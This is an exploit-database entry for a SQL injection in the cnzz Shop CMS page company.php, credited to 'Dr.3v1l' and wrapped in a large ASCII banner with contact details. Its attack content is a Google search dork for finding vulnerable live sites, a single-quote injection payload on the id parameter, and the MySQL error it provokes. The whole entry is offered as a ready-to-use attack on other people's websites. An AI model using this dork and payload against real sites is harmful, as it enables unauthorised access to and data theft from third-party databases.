cnzz CMS SQL Injection Vulnerability

2013-09-02T00:00:00
ID 1337DAY-ID-21185
Type zdt
Reporter Dr.3v1l
Modified 2013-09-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ########################################################################
#           1010101010101010101010101010101010101010101010101          #
#           0      __                 _  __                 0          #
#           1    /'__`\             /' \/\ \                1          #
#           0   /\_\ \ \   __   __ /\_, \ \ \               0          #
#           1   \/_/_\_<_ /\ \ /\ \\/_/\ \ \ \              1          #
#           0     /\ \ \ \\ \ \_/ /   \ \ \ \ \____         0          #
#           1     \ \____/ \ \___/     \ \_\ \_____\        1          #
#           0      \/___/   \/__/       \/_/\/_____/        0          #
#           1                                               1          #
#           0             >> Dr.3v1l                        0          #
#           1             >> 0WebSecurity.IR                1          #
#           0                                               0          #
#           1  [+] E-Mail  : [email protected]           1          #
#           0  [+] Y!      : Doctor.3v1l                    0          #
#           1                                               1          #
#           0  ###########################################  0          #
#           1  I'm 3v1l member from Black_Devils B0ys Team  1          #
#           0  ###########################################  0          #
#           1                                               1          #
#           0101010101010101010101010101010101010101010101010          #
########################################################################
#
# Exploit Title: Shop CMS company.php SQL Injection
# Date: 2013 31 August
# Author: Hossein Hezami ( Dr.3v1l )
# Software Link: www.cnzz.com
# Version: All Version
# Category: webapps
# Google Keywords: inurl:"/en/company.php?id="
# Tested on: Windows , Linux
#
########################################################################
#
# [~] Exploit :
#
#   [TARGET]/en/company.php?id=2'
#
########################################################################
#
# [~] Demo :
#
# http://<server>/en/company.php?id=2'
#
# SQLi Error :
#
# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' limit 1' at line 1
#
########################################################################
#
# [~] Note :
#
#      This Is A Simple SQL Injection
#      Found by Dr.3v1l
#
########################################################################
#
# [~] Contact Me :
#
#     [email protected]
#     [email protected]
#     Twitter.com/Doctor_3v1l
#     IR.LinkedIN.com/in/Hossein3v1l
#
########################################################################

#  0day.today [2018-01-09]  #